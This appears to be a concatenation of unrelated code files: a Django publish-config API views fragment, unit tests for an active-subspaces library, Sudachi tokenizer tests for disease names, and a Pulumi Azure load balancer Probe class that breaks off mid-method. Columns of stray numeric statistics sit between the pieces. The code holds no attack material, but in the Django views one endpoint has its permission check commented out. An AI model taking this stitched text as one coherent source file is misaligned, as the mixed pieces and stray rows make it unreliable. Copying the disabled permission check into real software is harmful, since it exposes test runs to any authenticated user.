return JsonResponse(code="999985", msg="该项目已禁用")
try:
publish = PublishConfig.objects.get(id=data["id"])
except ObjectDoesNotExist:
return JsonResponse(code="999987", msg="发布项目配置不存在!")
try:
serialize = PublishConfigDeserializer(data=data)
if serialize.is_valid():
serialize.update(instance=publish,validated_data=data)
# serialize.save()
return JsonResponse(code="999999", msg="成功!")
        except Exception:
logging.error(traceback.format_exc())
return JsonResponse(code="999998", msg="失败!")
class DelPublishConfig(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
@permission_required("delete_task")
def post(self, request):
"""
        Delete publish configs.
:param request:
:return:
"""
data = request.data
if not data["project_id"] or not data["ids"]:
return JsonResponse(code="999996", msg="参数有误!")
if not isinstance(data["project_id"], int) or not isinstance(data["ids"], list):
return JsonResponse(code="999996", msg="参数有误!")
for i in data["ids"]:
if not isinstance(i, int):
return JsonResponse(code="999996", msg="参数有误!")
try:
project = Project.objects.get(id=data["project_id"])
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="项目不存在!")
project = ProjectSerializer(project)
if not project.data["status"]:
return JsonResponse(code="999985", msg="该项目已禁用")
try:
for j in data["ids"]:
publish = PublishConfig.objects.filter(id=j, project=data['project_id'])
if len(publish) != 0:
name = publish[0].name
env=publish[0].env
publish.delete()
record_dynamic(project=data["project_id"],
_type="删除", operationObject="发布项目配置", user=request.user.pk, data="删除发布项目配置:\"%s\",测试环境:\"%s\"" % (name,env))
return JsonResponse(code="999999", msg="成功!")
        except Exception:
logging.error(traceback.format_exc())
return JsonResponse(code="999998", msg="失败!")
class DisablePublishConfig(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
@permission_required("change_task")
def post(self, request):
"""
        Disable a publish config.
:param request:
:return:
"""
data = request.data
        # Check that the publish config exists
try:
publish = PublishConfig.objects.get(id=data["id"])
publish.status = False
publish.save()
record_dynamic(project=data["project_id"],
_type="禁用", operationObject="发布项目配置", user=request.user.pk, data="禁用发布项目配置:\"%s\",测试环境:\"%s\"" % (publish.name,publish.env))
return JsonResponse(code="999999", msg="成功")
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="发布项目配置不存在!")
class EnablePublishConfig(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
@permission_required("change_task")
def post(self, request):
"""
        Enable a publish config.
:param request:
:return:
"""
data = request.data
        # Check that the publish config exists
try:
publish = PublishConfig.objects.get(id=data["id"])
publish.status = True
publish.save()
record_dynamic(project=data["project_id"],
_type="启用", operationObject="发布项目配置", user=request.user.pk, data="启用发布项目配置:\"%s\",测试环境:\"%s\"" % (publish.name,publish.env))
return JsonResponse(code="999999", msg="成功")
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="发布项目配置不存在!")
class RunPublishTest(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
# @permission_required("run_task")
def post(self, request):
"""
        Run a publish test.
:param request:
:return:
"""
data = request.data
        # Check that the publish config exists
try:
publish = PublishConfig.objects.get(id=data["publish"])
publish.sendEmail=data["sendEmail"]
publish.emails=data["emails"]
trace=datetime.now().strftime('%Y%m%d%H%M%S%f')
paramMap=json.loads(publish.params)
env = ProjectConfig.objects.filter(project=publish.project.id,name=publish.env,type="env").order_by("-id")[0]
envMap=json.loads(env.value)
env=envMap["env"] if "env" in envMap else ""
context={"project":publish.project.id,"value":paramMap,"result":{},"details":[],"status":"RUNNING","trace":trace,"env":env,"envMap":envMap,"user": request.user.pk if request.user.pk else 1}
PublishService.run_test(publish,data["id"],context)
record_dynamic(project=data["project_id"],
_type="执行", operationObject="发布项目测试", user=request.user.pk, data="测试发布项目:\"%s\",测试环境:\"%s\",上线单ID:\"%s\"" % (publish.name,publish.env,data["id"]))
return JsonResponse(code="999999", msg="成功")
        except Exception:
logging.error(traceback.format_exc())
return JsonResponse(code="999995", msg="失败!")
| 41.636596
| 226
| 0.564891
| 6,457
| 65,078
| 5.597956
| 0.058541
| 0.090134
| 0.099817
| 0.05345
| 0.805456
| 0.77447
| 0.750678
| 0.715902
| 0.700409
| 0.648315
| 0
| 0.026127
| 0.308937
| 65,078
| 1,562
| 227
| 41.663252
| 0.7776
| 0.036034
| 0
| 0.721048
| 0
| 0
| 0.092464
| 0.001922
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040575
| false
| 0
| 0.017751
| 0
| 0.313609
| 0.000845
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1ee133f4c4210ab087a17860ea22203e4b5d378a
| 105
|
py
|
Python
|
models/triplet_learner.py
|
saiakhil0034/SimilarityLearning
|
0b649e8ab48c065b35b656e3cc63a9f98897d857
|
[
"MIT"
] | 1
|
2021-06-07T07:12:53.000Z
|
2021-06-07T07:12:53.000Z
|
models/triplet_learner.py
|
saiakhil0034/SimilarityLearning
|
0b649e8ab48c065b35b656e3cc63a9f98897d857
|
[
"MIT"
] | null | null | null |
models/triplet_learner.py
|
saiakhil0034/SimilarityLearning
|
0b649e8ab48c065b35b656e3cc63a9f98897d857
|
[
"MIT"
] | null | null | null |
import torch.nn as nn
import torch.nn.functional as F
from models.embedding_learner import EmbeddingNet
| 21
| 49
| 0.838095
| 17
| 105
| 5.117647
| 0.647059
| 0.252874
| 0.298851
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12381
| 105
| 4
| 50
| 26.25
| 0.945652
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
94b32fc273cd02c9a575c3a6513ff02a1911b29b
| 6,557
|
py
|
Python
|
tests/test_base.py
|
carlosal1015/active_subspaces
|
caaf108fcb89548a374fea7704b0d92d38b4539a
|
[
"MIT"
] | 1
|
2020-03-16T18:05:05.000Z
|
2020-03-16T18:05:05.000Z
|
tests/test_base.py
|
carlosal1015/active_subspaces
|
caaf108fcb89548a374fea7704b0d92d38b4539a
|
[
"MIT"
] | null | null | null |
tests/test_base.py
|
carlosal1015/active_subspaces
|
caaf108fcb89548a374fea7704b0d92d38b4539a
|
[
"MIT"
] | 1
|
2020-03-16T18:05:09.000Z
|
2020-03-16T18:05:09.000Z
|
from unittest import TestCase
import unittest
import active_subspaces.response_surfaces as asm
import active_subspaces.optimizers as aso
import active_subspaces.subspaces as ss
import active_subspaces.domains as dom
import active_subspaces.base as base
import helper
import numpy as np
class TestBase(TestCase):
def quad_fun(self, x):
A = np.array([[ 0.2406659045776698, -0.3159904335007421, -0.1746908591702878],
[-0.3159904335007421, 0.5532215729009683, 0.3777995408101305],
[-0.1746908591702878, 0.3777995408101305, 0.3161125225213613]])
x = x.reshape((3,1))
return 0.5*np.dot(x.T,np.dot(A,x))
def quad_dfun(self, x):
A = np.array([[ 0.2406659045776698, -0.3159904335007421, -0.1746908591702878],
[-0.3159904335007421, 0.5532215729009683, 0.3777995408101305],
[-0.1746908591702878, 0.3777995408101305, 0.3161125225213613]])
return np.dot(A,x.reshape((3,1)))
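    # Note: for the symmetric A above, quad_dfun is the exact gradient of
    # quad_fun, since d/dx [0.5 * x^T A x] = A x whenever A == A^T. The df
    # arrays built in the tests below are therefore analytic gradients, not
    # finite-difference approximations.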
def test_rs_ubnd_int(self):
np.random.seed(42)
X = np.random.normal(size=(50,3))
f = np.zeros((50,1))
df = np.zeros((50,3))
for i in range(50):
x = X[i,:]
f[i,0] = self.quad_fun(x)
df[i,:] = self.quad_dfun(x).reshape((3, ))
model = base.ActiveSubspaceReducedModel(3, False)
model.build_from_data(X, f, df=df)
avg = model.average(20)[0]
prob, pl, pu = model.probability(0.0, 1.0)
fstar, xstar = model.minimum()
def test_rs_bnd_int(self):
np.random.seed(42)
X = np.random.uniform(-1.,1.,size=(50,3))
f = np.zeros((50,1))
df = np.zeros((50,3))
for i in range(50):
x = X[i,:]
f[i,0] = self.quad_fun(x)
df[i,:] = self.quad_dfun(x).reshape((3, ))
model = base.ActiveSubspaceReducedModel(3, True)
model.build_from_data(X, f, df=df)
avg = model.average(20)[0]
prob, pl, pu = model.probability(0.0, 1.0)
fstar, xstar = model.minimum()
def test_rs_ubnd_2d_int(self):
np.random.seed(42)
X = np.random.normal(size=(50,3))
f = np.zeros((50,1))
df = np.zeros((50,3))
for i in range(50):
x = X[i,:]
f[i,0] = self.quad_fun(x)
df[i,:] = self.quad_dfun(x).reshape((3, ))
model = base.ActiveSubspaceReducedModel(3, False)
model.build_from_data(X, f, df=df, avdim=2)
avg = model.average(20)[0]
prob, pl, pu = model.probability(0.0, 1.0)
fstar, xstar = model.minimum()
def test_rs_bnd_2d_int(self):
np.random.seed(42)
X = np.random.uniform(-1.,1.,size=(50,3))
f = np.zeros((50,1))
df = np.zeros((50,3))
for i in range(50):
x = X[i,:]
f[i,0] = self.quad_fun(x)
df[i,:] = self.quad_dfun(x).reshape((3, ))
model = base.ActiveSubspaceReducedModel(3, True)
model.build_from_data(X, f, df=df, avdim=2)
avg = model.average(20)[0]
prob, pl, pu = model.probability(0.0, 1.0)
fstar, xstar = model.minimum()
def test_rs_diag(self):
np.random.seed(42)
X = np.random.normal(size=(50,3))
f = np.zeros((50,1))
df = np.zeros((50,3))
for i in range(50):
x = X[i,:]
f[i,0] = self.quad_fun(x)
df[i,:] = self.quad_dfun(x).reshape((3, ))
model = base.ActiveSubspaceReducedModel(3, False)
model.build_from_data(X, f, df=df)
model.diagnostics()
def test_rs_predict(self):
np.random.seed(42)
X = np.random.normal(size=(50,3))
f = np.zeros((50,1))
df = np.zeros((50,3))
for i in range(50):
x = X[i,:]
f[i,0] = self.quad_fun(x)
df[i,:] = self.quad_dfun(x).reshape((3, ))
modelN = base.ActiveSubspaceReducedModel(3, False)
modelN.build_from_data(X, f, df=df)
XN = np.random.normal(size=X.shape)
modelN.predict(XN)
modelU = base.ActiveSubspaceReducedModel(3, True)
modelU.build_from_data(X, f, df=df)
XU = np.random.uniform(-1.0, 1.0, size=X.shape)
modelU.predict(XU)
def test_fun_rs_ubnd_int(self):
np.random.seed(42)
X = np.random.normal(size=(50,3))
f = np.zeros((50,1))
df = np.zeros((50,3))
for i in range(50):
x = X[i,:]
f[i,0] = self.quad_fun(x)
df[i,:] = self.quad_dfun(x).reshape((3, ))
model = base.ActiveSubspaceReducedModel(3, False)
model.build_from_interface(self.quad_fun, avdim=1)
avg = model.average(20)[0]
prob, pl, pu = model.probability(0.0, 1.0)
fstar, xstar = model.minimum()
def test_fun_rs_bnd_int(self):
np.random.seed(42)
X = np.random.uniform(-1.,1.,size=(100,3))
f = np.zeros((100,1))
df = np.zeros((100,3))
for i in range(100):
x = X[i,:]
f[i,0] = self.quad_fun(x)
df[i,:] = self.quad_dfun(x).reshape((3, ))
model = base.ActiveSubspaceReducedModel(3, True)
model.build_from_interface(self.quad_fun, avdim=1)
avg = model.average(20)[0]
prob, pl, pu = model.probability(0.0, 1.0)
fstar, xstar = model.minimum()
def test_fun_rs_ubnd_2d_int(self):
np.random.seed(42)
X = np.random.normal(size=(100,3))
f = np.zeros((100,1))
df = np.zeros((100,3))
for i in range(100):
x = X[i,:]
f[i,0] = self.quad_fun(x)
df[i,:] = self.quad_dfun(x).reshape((3, ))
model = base.ActiveSubspaceReducedModel(3, False)
model.build_from_interface(self.quad_fun, avdim=2)
avg = model.average(20)[0]
prob, pl, pu = model.probability(0.0, 1.0)
fstar, xstar = model.minimum()
def test_fun_rs_bnd_2d_int(self):
np.random.seed(42)
X = np.random.uniform(-1.,1.,size=(50,3))
f = np.zeros((50,1))
df = np.zeros((50,3))
for i in range(50):
x = X[i,:]
f[i,0] = self.quad_fun(x)
df[i,:] = self.quad_dfun(x).reshape((3, ))
model = base.ActiveSubspaceReducedModel(3, True)
model.build_from_interface(self.quad_fun, avdim=2)
avg = model.average(20)[0]
prob, pl, pu = model.probability(0.0, 1.0)
fstar, xstar = model.minimum()
if __name__ == '__main__':
unittest.main()
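A standalone sanity check (not part of the test file above) that the analytic gradient quad_dfun encodes, A @ x, matches a central-difference estimate of quad_fun; the test point x0 is arbitrary.

import numpy as np

A = np.array([[ 0.2406659045776698, -0.3159904335007421, -0.1746908591702878],
              [-0.3159904335007421, 0.5532215729009683, 0.3777995408101305],
              [-0.1746908591702878, 0.3777995408101305, 0.3161125225213613]])

def quad_fun(x):
    x = x.reshape((3, 1))
    return float(0.5 * x.T @ A @ x)

x0 = np.array([0.3, -0.7, 1.1])
grad_analytic = A @ x0  # gradient of 0.5 * x^T A x for symmetric A
eps = 1e-6
grad_fd = np.array([(quad_fun(x0 + eps * e) - quad_fun(x0 - eps * e)) / (2 * eps)
                    for e in np.eye(3)])
assert np.allclose(grad_analytic, grad_fd, atol=1e-5)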
| 31.985366
| 86
| 0.549337
| 962
| 6,557
| 3.642412
| 0.097713
| 0.054795
| 0.041096
| 0.045662
| 0.832477
| 0.829623
| 0.829623
| 0.818779
| 0.818779
| 0.818779
| 0
| 0.120396
| 0.291902
| 6,557
| 204
| 87
| 32.142157
| 0.634288
| 0
| 0
| 0.768293
| 0
| 0
| 0.00122
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.073171
| false
| 0
| 0.054878
| 0
| 0.146341
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
94ef5634d68ace2f064febd4032e1518892aa6c7
| 3,471
|
py
|
Python
|
tests/test_tokenize.py
|
yagays/manbyo-sudachi
|
39249dd8d18a33a6a15a5bc0140c7755b485d104
|
[
"CC-BY-4.0"
] | 3
|
2021-04-09T01:52:55.000Z
|
2022-03-18T02:12:42.000Z
|
tests/test_tokenize.py
|
yagays/manbyo-sudachi
|
39249dd8d18a33a6a15a5bc0140c7755b485d104
|
[
"CC-BY-4.0"
] | null | null | null |
tests/test_tokenize.py
|
yagays/manbyo-sudachi
|
39249dd8d18a33a6a15a5bc0140c7755b485d104
|
[
"CC-BY-4.0"
] | null | null | null |
from sudachipy import tokenizer
from sudachipy import dictionary
import pytest
@pytest.fixture(scope="module")
def tokenizer_all():
    return dictionary.Dictionary(config_path="config/sudachi_all.json").create()

@pytest.fixture(scope="module")
def tokenizer_sabc():
    return dictionary.Dictionary(config_path="config/sudachi_sabc.json").create()

def test_tokenize_disease_name_normal(tokenizer_all, tokenizer_sabc):
    text = "疼痛"
    assert tokenizer_all.tokenize(text, tokenizer.Tokenizer.SplitMode.B)[0].surface() == text
    assert tokenizer_sabc.tokenize(text, tokenizer.Tokenizer.SplitMode.B)[0].surface() == text

def test_tokenize_disease_name_alphabet_number_zen(tokenizer_all, tokenizer_sabc):
    text = "E2A−PBX1陽性Bリンパ芽球性白血病"
    assert tokenizer_all.tokenize(text, tokenizer.Tokenizer.SplitMode.B)[0].surface() == text
    assert tokenizer_sabc.tokenize(text, tokenizer.Tokenizer.SplitMode.B)[0].surface() == text

def test_tokenize_disease_name_alphabet_number_han(tokenizer_all, tokenizer_sabc):
    text = "e2a−pbx1陽性bリンパ芽球性白血病"
    assert tokenizer_all.tokenize(text, tokenizer.Tokenizer.SplitMode.B)[0].surface() == text
    assert tokenizer_sabc.tokenize(text, tokenizer.Tokenizer.SplitMode.B)[0].surface() == text

def test_tokenize_disease_name_phrase(tokenizer_all, tokenizer_sabc):
    text = "lsd使用による急性精神・行動障害"
    assert tokenizer_all.tokenize(text, tokenizer.Tokenizer.SplitMode.B)[0].surface() == text
    assert tokenizer_sabc.tokenize(text, tokenizer.Tokenizer.SplitMode.B)[0].surface() == text

def test_tokenize_disease_name_punctuation(tokenizer_all, tokenizer_sabc):
    text = "中咽頭癌、病期不明"
    assert tokenizer_all.tokenize(text, tokenizer.Tokenizer.SplitMode.B)[0].surface() == text
    assert tokenizer_sabc.tokenize(text, tokenizer.Tokenizer.SplitMode.B)[0].surface() == text

def test_tokenize_disease_name_punctuation_comma(tokenizer_all, tokenizer_sabc):
    text = "熱帯熱マラリア、赤痢"
    assert tokenizer_all.tokenize(text, tokenizer.Tokenizer.SplitMode.B)[0].surface() == text
    assert tokenizer_sabc.tokenize(text, tokenizer.Tokenizer.SplitMode.B)[0].surface() == text

def test_tokenize_disease_name_punctuation_comma_before_fix(tokenizer_all, tokenizer_sabc):
    text = "熱帯熱マラリア,赤痢"
    assert tokenizer_all.tokenize(text, tokenizer.Tokenizer.SplitMode.B)[0].surface() == "熱帯熱マラリア"
    assert tokenizer_sabc.tokenize(text, tokenizer.Tokenizer.SplitMode.B)[0].surface() == "熱帯熱マラリア"

def test_tokenize_disease_name_confidence_D(tokenizer_all, tokenizer_sabc):
    text = "脊椎腫瘤"
    assert tokenizer_all.tokenize(text, tokenizer.Tokenizer.SplitMode.B)[0].surface() == "脊椎腫瘤"
    assert tokenizer_sabc.tokenize(text, tokenizer.Tokenizer.SplitMode.B)[0].surface() == "脊椎"  # 脊椎 腫瘤

def test_tokenize_disease_name_confidence_F(tokenizer_all, tokenizer_sabc):
    text = "不感蒸散分"
    assert tokenizer_all.tokenize(text, tokenizer.Tokenizer.SplitMode.B)[0].surface() == "不感蒸散分"
    assert tokenizer_sabc.tokenize(text, tokenizer.Tokenizer.SplitMode.B)[0].surface() == "不感"  # 不感 蒸散 分

def test_tokenize_normal_text(tokenizer_all, tokenizer_sabc):
    text = "吾輩は猫である"
    assert [t.surface() for t in tokenizer_all.tokenize(text, tokenizer.Tokenizer.SplitMode.B)] == [
        "吾輩",
        "は",
        "猫",
        "で",
        "ある",
    ]
    assert [t.surface() for t in tokenizer_sabc.tokenize(text, tokenizer.Tokenizer.SplitMode.B)] == [
        "吾輩",
        "は",
        "猫",
        "で",
        "ある",
    ]
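A standalone usage sketch of the tokenizers exercised above; the config path and the sample string are taken from the fixtures and test cases in this file, and the sudachipy calls are its standard API.

from sudachipy import dictionary, tokenizer

tok = dictionary.Dictionary(config_path="config/sudachi_all.json").create()
mode = tokenizer.Tokenizer.SplitMode.B
# With the custom dictionary loaded, the whole disease name stays one token.
print([m.surface() for m in tok.tokenize("熱帯熱マラリア、赤痢", mode)])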
| 39.896552
| 105
| 0.741861
| 441
| 3,471
| 5.630385
| 0.154195
| 0.10149
| 0.16915
| 0.241643
| 0.910592
| 0.830044
| 0.77205
| 0.716472
| 0.706404
| 0.700765
| 0
| 0.007282
| 0.129646
| 3,471
| 86
| 106
| 40.360465
| 0.813638
| 0.003745
| 0
| 0.393443
| 0
| 0
| 0.059045
| 0.013603
| 0
| 0
| 0
| 0
| 0.327869
| 1
| 0.196721
| false
| 0
| 0.04918
| 0.032787
| 0.278689
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
94f7efe9bd0b70662e2d13b2bee7d69c97e7dafb
| 28,682
|
py
|
Python
|
sdk/python/pulumi_azure/lb/probe.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 109
|
2018-06-18T00:19:44.000Z
|
2022-02-20T05:32:57.000Z
|
sdk/python/pulumi_azure/lb/probe.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 663
|
2018-06-18T21:08:46.000Z
|
2022-03-31T20:10:11.000Z
|
sdk/python/pulumi_azure/lb/probe.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 41
|
2018-07-19T22:37:38.000Z
|
2022-03-14T10:56:26.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['ProbeArgs', 'Probe']
@pulumi.input_type
class ProbeArgs:
    def __init__(__self__, *,
                 loadbalancer_id: pulumi.Input[str],
                 port: pulumi.Input[int],
                 resource_group_name: pulumi.Input[str],
                 interval_in_seconds: Optional[pulumi.Input[int]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 number_of_probes: Optional[pulumi.Input[int]] = None,
                 protocol: Optional[pulumi.Input[str]] = None,
                 request_path: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a Probe resource.
        :param pulumi.Input[str] loadbalancer_id: The ID of the LoadBalancer in which to create the NAT Rule.
        :param pulumi.Input[int] port: Port on which the Probe queries the backend endpoint. Possible values range from 1 to 65535, inclusive.
        :param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the resource.
        :param pulumi.Input[int] interval_in_seconds: The interval, in seconds, between probes to the backend endpoint for health status. The default value is 15; the minimum value is 5.
        :param pulumi.Input[str] name: Specifies the name of the Probe.
        :param pulumi.Input[int] number_of_probes: The number of failed probe attempts after which the backend endpoint is removed from rotation. The default value is 2. NumberOfProbes multiplied by intervalInSeconds must be greater than or equal to 10. Endpoints are returned to rotation when at least one probe is successful.
        :param pulumi.Input[str] protocol: Specifies the protocol of the end point. Possible values are `Http`, `Https` or `Tcp`. If Tcp is specified, a received ACK is required for the probe to be successful. If Http is specified, a 200 OK response from the specified URI is required for the probe to be successful.
        :param pulumi.Input[str] request_path: The URI used for requesting health status from the backend endpoint. Required if protocol is set to `Http` or `Https`. Otherwise, it is not allowed.
        """
        pulumi.set(__self__, "loadbalancer_id", loadbalancer_id)
        pulumi.set(__self__, "port", port)
        pulumi.set(__self__, "resource_group_name", resource_group_name)
        if interval_in_seconds is not None:
            pulumi.set(__self__, "interval_in_seconds", interval_in_seconds)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if number_of_probes is not None:
            pulumi.set(__self__, "number_of_probes", number_of_probes)
        if protocol is not None:
            pulumi.set(__self__, "protocol", protocol)
        if request_path is not None:
            pulumi.set(__self__, "request_path", request_path)

    @property
    @pulumi.getter(name="loadbalancerId")
    def loadbalancer_id(self) -> pulumi.Input[str]:
        """
        The ID of the LoadBalancer in which to create the NAT Rule.
        """
        return pulumi.get(self, "loadbalancer_id")

    @loadbalancer_id.setter
    def loadbalancer_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "loadbalancer_id", value)

    @property
    @pulumi.getter
    def port(self) -> pulumi.Input[int]:
        """
        Port on which the Probe queries the backend endpoint. Possible values range from 1 to 65535, inclusive.
        """
        return pulumi.get(self, "port")

    @port.setter
    def port(self, value: pulumi.Input[int]):
        pulumi.set(self, "port", value)

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Input[str]:
        """
        The name of the resource group in which to create the resource.
        """
        return pulumi.get(self, "resource_group_name")

    @resource_group_name.setter
    def resource_group_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "resource_group_name", value)

    @property
    @pulumi.getter(name="intervalInSeconds")
    def interval_in_seconds(self) -> Optional[pulumi.Input[int]]:
        """
        The interval, in seconds, between probes to the backend endpoint for health status. The default value is 15; the minimum value is 5.
        """
        return pulumi.get(self, "interval_in_seconds")

    @interval_in_seconds.setter
    def interval_in_seconds(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "interval_in_seconds", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the name of the Probe.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="numberOfProbes")
    def number_of_probes(self) -> Optional[pulumi.Input[int]]:
        """
        The number of failed probe attempts after which the backend endpoint is removed from rotation. The default value is 2. NumberOfProbes multiplied by intervalInSeconds must be greater than or equal to 10. Endpoints are returned to rotation when at least one probe is successful.
        """
        return pulumi.get(self, "number_of_probes")

    @number_of_probes.setter
    def number_of_probes(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "number_of_probes", value)

    @property
    @pulumi.getter
    def protocol(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the protocol of the end point. Possible values are `Http`, `Https` or `Tcp`. If Tcp is specified, a received ACK is required for the probe to be successful. If Http is specified, a 200 OK response from the specified URI is required for the probe to be successful.
        """
        return pulumi.get(self, "protocol")

    @protocol.setter
    def protocol(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "protocol", value)

    @property
    @pulumi.getter(name="requestPath")
    def request_path(self) -> Optional[pulumi.Input[str]]:
        """
        The URI used for requesting health status from the backend endpoint. Required if protocol is set to `Http` or `Https`. Otherwise, it is not allowed.
        """
        return pulumi.get(self, "request_path")

    @request_path.setter
    def request_path(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "request_path", value)

@pulumi.input_type
class _ProbeState:
    def __init__(__self__, *,
                 interval_in_seconds: Optional[pulumi.Input[int]] = None,
                 load_balancer_rules: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 loadbalancer_id: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 number_of_probes: Optional[pulumi.Input[int]] = None,
                 port: Optional[pulumi.Input[int]] = None,
                 protocol: Optional[pulumi.Input[str]] = None,
                 request_path: Optional[pulumi.Input[str]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering Probe resources.
        :param pulumi.Input[int] interval_in_seconds: The interval, in seconds, between probes to the backend endpoint for health status. The default value is 15; the minimum value is 5.
        :param pulumi.Input[str] loadbalancer_id: The ID of the LoadBalancer in which to create the NAT Rule.
        :param pulumi.Input[str] name: Specifies the name of the Probe.
        :param pulumi.Input[int] number_of_probes: The number of failed probe attempts after which the backend endpoint is removed from rotation. The default value is 2. NumberOfProbes multiplied by intervalInSeconds must be greater than or equal to 10. Endpoints are returned to rotation when at least one probe is successful.
        :param pulumi.Input[int] port: Port on which the Probe queries the backend endpoint. Possible values range from 1 to 65535, inclusive.
        :param pulumi.Input[str] protocol: Specifies the protocol of the end point. Possible values are `Http`, `Https` or `Tcp`. If Tcp is specified, a received ACK is required for the probe to be successful. If Http is specified, a 200 OK response from the specified URI is required for the probe to be successful.
        :param pulumi.Input[str] request_path: The URI used for requesting health status from the backend endpoint. Required if protocol is set to `Http` or `Https`. Otherwise, it is not allowed.
        :param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the resource.
        """
        if interval_in_seconds is not None:
            pulumi.set(__self__, "interval_in_seconds", interval_in_seconds)
        if load_balancer_rules is not None:
            pulumi.set(__self__, "load_balancer_rules", load_balancer_rules)
        if loadbalancer_id is not None:
            pulumi.set(__self__, "loadbalancer_id", loadbalancer_id)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if number_of_probes is not None:
            pulumi.set(__self__, "number_of_probes", number_of_probes)
        if port is not None:
            pulumi.set(__self__, "port", port)
        if protocol is not None:
            pulumi.set(__self__, "protocol", protocol)
        if request_path is not None:
            pulumi.set(__self__, "request_path", request_path)
        if resource_group_name is not None:
            pulumi.set(__self__, "resource_group_name", resource_group_name)

    @property
    @pulumi.getter(name="intervalInSeconds")
    def interval_in_seconds(self) -> Optional[pulumi.Input[int]]:
        """
        The interval, in seconds, between probes to the backend endpoint for health status. The default value is 15; the minimum value is 5.
        """
        return pulumi.get(self, "interval_in_seconds")

    @interval_in_seconds.setter
    def interval_in_seconds(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "interval_in_seconds", value)

    @property
    @pulumi.getter(name="loadBalancerRules")
    def load_balancer_rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        return pulumi.get(self, "load_balancer_rules")

    @load_balancer_rules.setter
    def load_balancer_rules(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "load_balancer_rules", value)

    @property
    @pulumi.getter(name="loadbalancerId")
    def loadbalancer_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the LoadBalancer in which to create the NAT Rule.
        """
        return pulumi.get(self, "loadbalancer_id")

    @loadbalancer_id.setter
    def loadbalancer_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "loadbalancer_id", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the name of the Probe.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="numberOfProbes")
    def number_of_probes(self) -> Optional[pulumi.Input[int]]:
        """
        The number of failed probe attempts after which the backend endpoint is removed from rotation. The default value is 2. NumberOfProbes multiplied by intervalInSeconds must be greater than or equal to 10. Endpoints are returned to rotation when at least one probe is successful.
        """
        return pulumi.get(self, "number_of_probes")

    @number_of_probes.setter
    def number_of_probes(self, value: Optional[pulumi.Input[int]]):
